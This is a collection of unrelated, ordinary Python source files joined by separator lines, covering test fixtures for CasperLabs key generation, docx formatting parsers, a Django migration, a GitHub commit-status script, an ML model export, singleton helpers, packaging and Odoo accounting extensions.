            self.eq(env.axon_client.wants((nullhash,)), ())
            self.eq(list(env.axon_client.bytes(nullhash)), [b''])
|
# -*- coding: utf-8 -*-
import shutil
from pathlib import Path
import pytest
import tempfile
from casperlabs_client import CasperLabsClient, key_holders
from casperlabs_client.consts import (
SUPPORTED_KEY_ALGORITHMS,
PUBLIC_KEY_FILENAME,
PRIVATE_KEY_FILENAME,
PUBLIC_KEY_HEX_FILENAME,
)
@pytest.fixture(scope="session")
def fake_wasm():
    """Yield an (empty) temporary file standing in for a wasm contract."""
    with tempfile.NamedTemporaryFile() as f:
        yield f
@pytest.fixture(scope="session")
def account_keys_directory():
    """Yield a temp directory holding one generated key pair per algorithm.

    Files are renamed to "<algorithm><original name>" so that the keys of all
    algorithms can coexist in the single directory.
    """
    with tempfile.TemporaryDirectory() as directory:
        for key_algorithm in SUPPORTED_KEY_ALGORITHMS:
            client = CasperLabsClient()
            client.keygen(directory, algorithm=key_algorithm)
            for file_name in (
                PUBLIC_KEY_FILENAME,
                PUBLIC_KEY_HEX_FILENAME,
                PRIVATE_KEY_FILENAME,
            ):
                # Prefix with the algorithm so the next keygen can't clobber it.
                shutil.move(
                    Path(directory) / file_name,
                    Path(directory) / f"{key_algorithm}{file_name}",
                )
        yield Path(directory)
@pytest.fixture(scope="session")
def validator_keys_directory():
    """Yield a temp directory populated with a freshly generated validator key set."""
    with tempfile.TemporaryDirectory() as directory:
        client = CasperLabsClient()
        client.validator_keygen(directory)
        yield Path(directory)
def key_paths(algorithm, directory):
    """Return the (private_pem, public_pem) paths for *algorithm* in *directory*."""
    private_pem = directory / f"{algorithm}{PRIVATE_KEY_FILENAME}"
    public_pem = directory / f"{algorithm}{PUBLIC_KEY_FILENAME}"
    return private_pem, public_pem
@pytest.fixture(scope="session")
def account_keys(account_keys_directory):
    """Map each supported algorithm to its pem paths and a loaded key holder."""
    algorithm_keys = {}
    for algorithm in SUPPORTED_KEY_ALGORITHMS:
        private_pem_path, public_pem_path = key_paths(algorithm, account_keys_directory)
        # Rebuild the in-memory key holder from the private key keygen wrote.
        key_holder = key_holders.class_from_algorithm(algorithm).from_private_key_path(
            private_pem_path
        )
        keys_files = {
            "private_pem": private_pem_path,
            "public_pem": public_pem_path,
            "key_holder": key_holder,
        }
        algorithm_keys[algorithm] = keys_files
    return algorithm_keys
# Scoping this per call as we mock it.
@pytest.fixture
def client():
    """Return a fresh CasperLabsClient for each test (function-scoped on purpose)."""
    return CasperLabsClient()
|
# -*- coding: utf-8 -*-
from ....Classes.OutMag import OutMag
from ....Classes.Simulation import Simulation
from ....Methods.Simulation.Input import InputError
def gen_input(self):
    """Generate the input for the structural module (magnetic output)

    Builds an OutMag from this InFlux's axes and flux-density data and stores
    it on the enclosing Output (``self.parent.parent.mag``).

    Parameters
    ----------
    self : InFlux
        An InFlux object

    Raises
    ------
    InputError
        If not nested in a Simulation/Output, or if ``self.B`` is missing.
    """
    output = OutMag()
    # get the simulation
    if isinstance(self.parent, Simulation):
        simu = self.parent
    elif isinstance(self.parent.parent, Simulation):
        simu = self.parent.parent
    else:
        # NOTE(review): message says "InputCurrent" but this is InFlux.
        raise InputError(
            "ERROR: InputCurrent object should be inside a Simulation object"
        )
    # Set discretization
    if self.OP is None:
        N0 = None  # N0 can be None if time isn't
    else:
        N0 = self.OP.N0
    Time, Angle = self.comp_axes(simu.machine, N0)
    output.Time = Time
    output.Angle = Angle
    if self.B is None:
        raise InputError("ERROR: InFlux.B missing")
    # Fill in default metadata for the flux-density field.
    if self.B.name is None:
        self.B.name = "Airgap flux density"
    if self.B.symbol is None:
        self.B.symbol = "B"
    B = self.B.get_data()
    output.B = B
    if self.parent.parent is None:
        raise InputError(
            "ERROR: The Simulation object must be in an Output object to run"
        )
    # Save the Output in the correct place
    self.parent.parent.mag = output
    # Define the electrical Output to set the Operating Point
    if self.OP is not None:
        self.OP.gen_input()
|
from bs4 import BeautifulSoup
from dedoc.readers.docx_reader.data_structures.base_props import BaseProperties
def check_if_true(value: str) -> bool:
    """Return True for the docx truthy markers '1', 'True' and 'true'."""
    return value in ('1', 'True', 'true')
def change_paragraph_properties(old_properties: BaseProperties, tree: BeautifulSoup) -> None:
    """
    changes old properties indent, size, jc, spacing_before, spacing_after if they were found in tree
    :param old_properties: Paragraph
    :param tree: BeautifulSoup tree with properties
    """
    for changer in (change_indent, change_size, change_jc, change_spacing):
        changer(old_properties, tree)
def change_run_properties(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
    """
    changes old properties: bold, italic, underlined, size if they were found in tree
    :param old_properties: Run
    :param tree: BeautifulSoup tree with properties
    """
    change_size(old_properties, tree)
    change_caps(old_properties, tree)

    def _toggle(tag, default):
        # w:val may be absent (-> default), or a truthy-marker string.
        raw = tag.get("w:val", default)
        return check_if_true(raw) if isinstance(raw, str) else raw

    if tree.b:
        old_properties.bold = _toggle(tree.b, True)
    if tree.i:
        old_properties.italic = _toggle(tree.i, True)
    if tree.u:
        underline = tree.u.get("w:val", False)
        if underline == 'none':
            old_properties.underlined = False
        elif isinstance(underline, str):
            old_properties.underlined = True
    if tree.strike:
        old_properties.strike = _toggle(tree.strike, True)
    if tree.vertAlign:
        script = tree.vertAlign.attrs.get("w:val")
        if script == "superscript":
            old_properties.superscript = True
        elif script == "subscript":
            old_properties.subscript = True
def change_indent(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
    """
    changes old properties: indent if it was found in tree
    :param old_properties: Paragraph
    :param tree: BeautifulSoup tree with properties
    """
    # firstLine describes additional indentation to current indentation, if hanging is present firstLine is ignored
    # firstLineChars differs from firstLine only in measurement (one hundredths of a character unit)
    # hanging removes indentation from current indentation (analogous hangingChars)
    # start describes classical indentation (startChars)
    # left isn't specified in the documentation
    # main measurement 1/1440 of an inch
    # 1 inch is 12 char units, 1/100 char unit = 1/1200 inch = 1.2 * (1/1440 of an inch)
    if not tree.ind:
        return
    names = ("firstLine", "firstLineChars", "hanging", "hangingChars",
             "start", "startChars", "left")
    attrs = {name: int(tree.ind.get("w:{}".format(name), 0)) for name in names}
    # Base indentation: left wins, then start, then startChars (converted).
    if attrs["left"] != 0:
        indentation = attrs["left"]
    elif attrs["start"] != 0:
        indentation = attrs["start"]
    elif attrs["startChars"] != 0:
        indentation = attrs["startChars"] / 1.2
    else:
        indentation = 0
    # First-line additions apply only when no hanging indent is set.
    if attrs["firstLine"] != 0 and attrs["hanging"] == 0:
        indentation += attrs["firstLine"]
    if attrs["firstLineChars"] != 0 and attrs["hangingChars"] == 0:
        indentation += attrs["firstLineChars"] / 1.2
    if attrs["hanging"] != 0:
        indentation -= attrs["hanging"]
    elif attrs["hangingChars"] != 0:
        indentation -= attrs["hangingChars"] / 1.2
    old_properties.indentation = indentation
def change_size(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
    """
    changes old properties: size if it was found in tree
    :param old_properties: Paragraph or Run
    :param tree: BeautifulSoup tree with properties
    """
    if not tree.sz:
        return
    old_properties.size = int(tree.sz.get('w:val', old_properties.size))
def change_jc(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
    """
    changes old_properties: jc (alignment) if tag jc was found in tree
    :param old_properties: Paragraph
    :param tree: BeautifulSoup tree with properties
    """
    # alignment values: left (default), right, center, both
    if not tree.jc:
        return
    # Writing direction decides how the logical values start/end resolve.
    if tree.bidi:
        bidi_value = tree.bidi.get('w:val', True)
        right_to_left = check_if_true(bidi_value) if isinstance(bidi_value, str) else bidi_value
    else:
        right_to_left = False
    alignment = tree.jc.get('w:val', old_properties.jc)
    if alignment in ('both', 'center', 'right'):
        old_properties.jc = alignment
    elif (alignment == 'end' and not right_to_left) or (alignment == 'start' and right_to_left):
        old_properties.jc = 'right'
def change_caps(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
    """
    changes old_properties: caps if tag caps was found in tree
    :param old_properties: Paragraph or Run
    :param tree: BeautifulSoup tree with properties
    """
    if not tree.caps:
        return
    raw = tree.caps.get('w:val', True)
    old_properties.caps = check_if_true(raw) if isinstance(raw, str) else raw
def change_spacing(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
    """
    changes old_properties: spacing_before, spacing_after if tag spacing was found in tree
    :param old_properties: Paragraph
    :param tree: BeautifulSoup tree with properties
    """
    # tag <spacing> may have the following attributes for spacing between paragraphs:
    # after / before (measured in twentieths of a point), ignored if afterLines or afterAutospacing are specified
    # afterAutospacing / beforeAutospacing (we set 0 if specified) if is specified, other attributes are ignored
    # afterLines / beforeLines (measured in one hundredths of a line)
    # if we have spacing after value for the previous paragraph and spacing before value for the next paragraph
    # we choose maximum between these two values
    if not tree.spacing:
        return

    def _side(autospacing_attr, lines_attr, plain_attr):
        # Resolution order: autospacing beats lines, which beats the plain value.
        autospacing = tree.spacing.get(autospacing_attr, False)
        if autospacing:
            autospacing = check_if_true(autospacing)
        if autospacing:
            return 0
        lines = tree.spacing.get(lines_attr, False)
        if lines:
            lines = int(lines)
        if lines:
            return lines
        plain = tree.spacing.get(plain_attr, False)
        return int(plain) if plain else 0

    old_properties.spacing_before = _side("w:beforeAutospacing", "w:beforeLines", "w:before")
    old_properties.spacing_after = _side("w:afterAutospacing", "w:afterLines", "w:after")
|
# Generated by Django 3.0.5 on 2021-01-27 14:35
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Visitor table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Visitor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Registration timestamp, set once at creation.
                ('dtRegistered', models.DateTimeField(auto_now_add=True)),
                # NOTE(review): max_length has no effect on DateField.
                ('dtBirth', models.DateField(max_length=8)),
                ('strFullName', models.CharField(max_length=256)),
                ('strGovtIdNo', models.CharField(max_length=16)),
                ('eGender', models.CharField(choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Other')], default='X', max_length=2)),
            ],
            options={
                'ordering': ['dtRegistered'],
            },
        ),
    ]
|
"""
Usage:
github-commit-status -c <commit-hash> -s <status> -u <github-username> -p <github-password> -r <github_repo> --url <URL> --context <context> -d "<description>"
github-commit-status -c <commit-hash> -s <status> -t <github-token> -r <github_repo> --url <URL> --context <context> -d "<description>"
Options:
-c <commit-hash>, --commit-hash <commit-hash> Github commit hash
-s <status>, --status <status> Status to set [pending, success, error, or failure]
-u <username>, --username <username> github username
-p <password>, --password <password> github password
-t <token>, --token <token> github access token
-r <repository>, --repo <repository> github repository
-d <description> --description <description> description of the status
--url <url> URL to refer back to
--context <context> The context of the status. Typically the name of the service creating the status.
"""
from docopt import docopt
from github import Github
def main(argv=None, test=False):
    """Set a GitHub commit status from the command line (see module docstring).

    :param argv: argument list for docopt; None means sys.argv[1:].
    :param test: when True, return the created status object.
    :raises ValueError: when neither --token nor --username/--password is given
        (BUG FIX: the original fell through and crashed with NameError on ``g``).
    """
    arguments = docopt(__doc__, argv=argv)
    status = arguments['--status']
    commit = arguments['--commit-hash']
    user = arguments['--username']
    password = arguments['--password']
    token = arguments['--token']
    url = arguments['--url']
    repo = arguments['--repo']
    context = arguments['--context']
    description = arguments['--description']
    # BUG FIX: Python-2-only print statement replaced by a py2/py3 form.
    print("Setting status %s for commit %s." % (status, commit))
    if token:
        g = Github(token)
    elif user and password:
        g = Github(user, password)
    else:
        raise ValueError("Either --token or --username and --password are required.")
    r = g.get_repo(repo)
    c = r.get_commit(commit)
    s = c.create_status(status, target_url=url, description=description, context=context)
    if test:
        return s
if __name__ == "__main__":
main() |
import os
import joblib
import numpy as np
from rlkit.samplers.util import rollout
files = dict(
reach_left=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-left/09-14_pusher-3dof-reacher-naf-yolo_left_2017_09_14_17_52_45_0010/params.pkl'
),
reach_right=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-right/09-14_pusher-3dof-reacher-naf-yolo_right_2017_09_14_17_52_45_0016/params.pkl'
),
reach_middle=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-middle/09-14_pusher-3dof-reacher-naf-yolo_middle_2017_09_14_17_52_45_0013/params.pkl'
),
reach_bottom=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom/09-14_pusher-3dof-reacher-naf-yolo_bottom_2017_09_14_17_52_45_0019/params.pkl'
),
merge_bottom_left=(
'/home/vitchyr/git/rllab-rail/railrl/data/local/09-14-1-combine-naf-policies-left/09-14_1-combine-naf-policies-left_2017_09_14_21_42_24_0000--s-68077/params.pkl'
),
merge_bottom_right=(
'/home/vitchyr/git/rllab-rail/railrl/data/local/09-14-1-combine-naf-policies-right/09-14_1-combine-naf-policies-right_2017_09_14_21_42_29_0000--s-42677/params.pkl'
),
merge_bottom_middle=(
'/home/vitchyr/git/rllab-rail/railrl/data/local/09-14-1-combine-naf-policies-middle/09-14_1-combine-naf-policies-middle_2017_09_14_21_42_27_0000--s-91696/params.pkl'
),
reach_bottom_left=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom-left/09-14_pusher-3dof-reacher-naf-yolo_bottom-left_2017_09_14_17_52_45_0001/params.pkl'
),
reach_bottom_right=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom-right/09-14_pusher-3dof-reacher-naf-yolo_bottom-right_2017_09_14_17_52_45_0007/params.pkl'
),
reach_bottom_middle=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom-middle/09-14_pusher-3dof-reacher-naf-yolo_bottom-middle_2017_09_14_17_52_45_0005/params.pkl'
),
)
# Roll out each saved policy 100 times and dump the final object positions.
for name, full_path in files.items():
    name = name.replace('_', '-')  # in case Tuomas's script cares
    data = joblib.load(full_path)
    # Snapshots store the policy under different keys depending on the run.
    if 'policy' in data:
        policy = data['policy']
    else:
        policy = data['naf_policy']
    env = data['env']
    print(name)
    pos_lst = list()
    for i in range(100):
        path = rollout(env, policy, max_path_length=300, animated=False)
        # Last-but-one pair of the final observation -- presumably the
        # object's (x, y) position; TODO confirm against the env definition.
        pos_lst.append(path['final_observation'][-3:-1])
    pos_all = np.stack(pos_lst)
    outfile = os.path.join('data/papers/icra2018/results/pusher/naf',
                           name + '.txt')
    np.savetxt(outfile, pos_all)
|
import numpy as np
from tensorflow.python.keras.models import Model
from tensorflow.python.keras.layers import Dense
from tensorflow.python.keras import backend as K
import tensorflow as tf
from keras.applications.mobilenet_v2 import MobileNetV2
#from keras.models import load_model
# Target model: ImageNet-pretrained MobileNetV2 with its classification head.
base_model = MobileNetV2(include_top=True, weights='imagenet')
# Alternative: load the target model from an HDF5 checkpoint instead.
#base_model = load_model("input.hdf5")
# Model input/output; node names are specific to this Keras graph.
input_shape = [1, 224, 224, 3]  # fixed batch of 1 (presumably NHWC)
input_node_name = "mobilenetv2_1.00_224/Conv1_pad/Pad"
output_node_name = "mobilenetv2_1.00_224/Logits/Softmax"
output_folder = "./models"
output_name = "output.pb"
# Export via TensorFlow 1.x: run the model in inference mode...
tf.keras.backend.set_learning_phase(0)
x = tf.placeholder(tf.float32, input_shape, name="model_input")
y = base_model(x)
base_model.summary()
# Variables Keras has not initialized yet must be initialized by hand.
uninitialized_variables = [v for v in tf.global_variables() \
    if not hasattr(v, '_keras_initialized') or not v._keras_initialized]
# ...then fold all variables into constants and write the frozen graph.
sess = K.get_session()
gd = sess.graph.as_graph_def()
print("node list")
for node in gd.node:
    print(node)
sess.run(tf.variables_initializer(uninitialized_variables))
frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess,gd,[output_node_name])
tf.train.write_graph(frozen_graph_def,output_folder,name=output_name,as_text=False)
|
"""Translation using local data given at initialization."""
from rics.translation.offline._format import Format
from rics.translation.offline._format_applier import DefaultFormatApplier, FormatApplier
from rics.translation.offline._magic_dict import MagicDict
from rics.translation.offline._placeholder_overrides import PlaceholderOverrides
from rics.translation.offline._translation_map import TranslationMap
__all__ = ["Format", "FormatApplier", "DefaultFormatApplier", "PlaceholderOverrides", "TranslationMap", "MagicDict"]
|
# -*- coding:utf-8 -*-
# author: Cone
# datetime: 2020-01-10 17:09
# software: PyCharm
def singleton(cls):
    """Class decorator turning *cls* into a lazily-created singleton.

    Generalized over the original: constructor arguments are now forwarded to
    the first instantiation (the original `inner()` accepted none, so decorated
    classes with required __init__ arguments could never be built).  Arguments
    passed on later calls are ignored -- the cached instance is returned.
    """
    _instances = {}

    def inner(*args, **kwargs):
        if cls not in _instances:
            _instances[cls] = cls(*args, **kwargs)
        return _instances[cls]
    return inner
class Singleton(object):
    """Callable wrapper caching a single no-argument instance of the wrapped class."""

    def __init__(self, cls):
        self._cls = cls
        self._instance = {}

    def __call__(self):
        # EAFP: the cache hit is the common case after the first call.
        try:
            return self._instance[self._cls]
        except KeyError:
            obj = self._instance[self._cls] = self._cls()
            return obj
class SingletonMeta(type):
    """Metaclass: every class using it yields one shared instance.

    Note the cache is stored on SingletonMeta itself, so it is shared by all
    classes using this metaclass (keyed by class, so instances stay distinct).
    """
    _instances = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            # BUG FIX: the original wrote super(Singleton, cls).__call__, but
            # Singleton is not in SingletonMeta's MRO, so the first
            # instantiation raised TypeError.  The correct first argument is
            # this metaclass, delegating to type.__call__.
            cls._instances[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs)
        return cls._instances[cls]
|
from distutils.core import setup
# Prefer setuptools' setup() (needed for install_requires); silently fall back
# to the distutils one imported above when setuptools is unavailable.
# NOTE(review): the bare except also hides unrelated import errors.
try:
    from setuptools import setup
except:
    pass
setup(
    name = "kiss.py",
    version = "1.0.0",
    author = "Stanislav Feldman",
    description = ("MVC web framework in Python with Gevent, Jinja2, Werkzeug"),
    url = "http://stanislavfeldman.github.com/kiss.py/",
    keywords = "web framework gevent jinja2 werkzeug orm oauth socialauth vkontakte facebook google yandex",
    packages=[
        "kiss", "kiss.controllers", "kiss.core", "kiss.views", "kiss.models"
    ],
    install_requires = ["gevent", "jinja2", "compressinja", "beaker", "werkzeug", "putils", "jsmin", "pyScss", "sqlalchemy == 0.7.8", "elixir", "jsonpickle", "pev", "requests", "pycrypto"],
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Topic :: Software Development",
        "Topic :: Software Development :: Libraries :: Application Frameworks"
    ],
)
|
__author__ = 'thorsteinn'
from dnv_exchange.input_files.dbDNV1 import db as db1
from dnv_exchange.input_files.dbDNV2 import db as db2
from dnv_exchange.input_files.dbDNV3 import db as db3
from dnv_exchange.input_files.dbDNV4 import db as db4
from dnv_exchange.input_files.dbDNV5 import db as db5
from dnv_exchange.input_files.dbDNV6 import db as db6
from dnv_exchange.input_files.dbDNV7 import db as db7
from dnv_exchange.input_files.dbDNV8 import db as db8
from dnv_exchange.input_files.eimskipaskip_DNV import db as db9
from db_to_file_helpers.jsonDicts_to_file import db_to_file
# Merge the per-file DNV databases into a single dict (later files win on
# duplicate keys, in the same db1..db9 order as before) and dump it to disk.
db = {}
for partial in (db1, db2, db3, db4, db5, db6, db7, db8, db9):
    db.update(partial)
db_to_file(db, '../output_files/dnv_db_get_1.txt')
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Data access utility functions and classes.
"""
import json
import os
def MakeDirectory(path):
  """Makes a directory recursively without raising exceptions if existing.

  BUG FIX: the original checked os.path.exists() before os.makedirs(), which
  (a) races with concurrent creators (TOCTOU) and (b) silently accepted an
  existing *file* at the path.  Now the error case is inspected instead.

  Args:
    path: path to the directory to be created.
  """
  try:
    os.makedirs(path)
  except OSError:
    # Already present as a directory: fine (possibly created concurrently).
    # Anything else (permissions, a regular file in the way) is re-raised.
    if not os.path.isdir(path):
      raise
class Metadata(object):
  """Data access class to save and load audio-test metadata as JSON."""

  _AUDIO_TEST_DATA_FILENAME = 'audio_test_data.json'

  def __init__(self):
    pass

  @classmethod
  def LoadAudioTestDataPaths(cls, metadata_path):
    """Loads the saved audio track paths.

    Args:
      metadata_path: path to the directory containing the metadata file.

    Returns:
      The deserialized JSON content (dict of audio track file paths).
    """
    filepath = os.path.join(metadata_path, cls._AUDIO_TEST_DATA_FILENAME)
    with open(filepath) as json_file:
      return json.load(json_file)

  @classmethod
  def SaveAudioTestDataPaths(cls, output_path, **filepaths):
    """Saves the given audio track paths.

    Args:
      output_path: path to the directory containing the metadata file.

    Keyword Args:
      filepaths: collection of audio track file paths to save.
    """
    filepath = os.path.join(output_path, cls._AUDIO_TEST_DATA_FILENAME)
    with open(filepath, 'w') as json_file:
      json.dump(filepaths, json_file)
class AudioProcConfigFile(object):
  """Data access to load/save audioproc_f argument lists.

  The arguments stored in the config files are used to control the APM flags.
  """

  def __init__(self):
    pass

  @classmethod
  def Load(cls, filepath):
    """Loads a configuration file for audioproc_f.

    Args:
      filepath: path to the configuration file.

    Returns:
      A dict containing the configuration.
    """
    with open(filepath) as json_file:
      return json.load(json_file)

  @classmethod
  def Save(cls, filepath, config):
    """Saves a configuration file for audioproc_f.

    Args:
      filepath: path to the configuration file.
      config: a dict containing the configuration.
    """
    with open(filepath, 'w') as json_file:
      json.dump(config, json_file)
class ScoreFile(object):
  """Data access class to save and load float scalar scores."""

  def __init__(self):
    pass

  @classmethod
  def Load(cls, filepath):
    """Loads a score from file.

    Args:
      filepath: path to the score file.

    Returns:
      A float encoding the score.
    """
    with open(filepath) as score_file:
      first_line = score_file.readline()
    return float(first_line.strip())

  @classmethod
  def Save(cls, filepath, score):
    """Saves a score into a file.

    Args:
      filepath: path to the score file.
      score: float encoding the score.
    """
    # '%f' matches the original '{0:f}' formatting (6 decimal places).
    with open(filepath, 'w') as score_file:
      score_file.write('%f\n' % score)
|
# -*- coding: utf-8 -*-
from odoo import models, fields
class AccountMove(models.Model):
    """Extends account.move with a backlink to the repair orders it invoices."""
    _inherit = 'account.move'

    # Repair orders invoiced through this move (inverse of repair.order.invoice_id).
    repair_ids = fields.One2many('repair.order', 'invoice_id', readonly=True, copy=False)

    def unlink(self):
        """On invoice deletion, flag linked non-cancelled repairs as to-be-invoiced again."""
        repairs = self.sudo().repair_ids.filtered(lambda repair: repair.state != 'cancel')
        if repairs:
            # sudo() was only needed to read across access rules; drop the
            # elevated rights before writing the state back.
            repairs.sudo(False).state = '2binvoiced'
        return super().unlink()
class AccountMoveLine(models.Model):
    """Extends account.move.line with backlinks to the repair lines/fees it bills."""
    _inherit = 'account.move.line'

    # Repair operation lines billed by this invoice line.
    repair_line_ids = fields.One2many('repair.line', 'invoice_line_id', readonly=True, copy=False)
    # Repair fee lines billed by this invoice line.
    repair_fee_ids = fields.One2many('repair.fee', 'invoice_line_id', readonly=True, copy=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.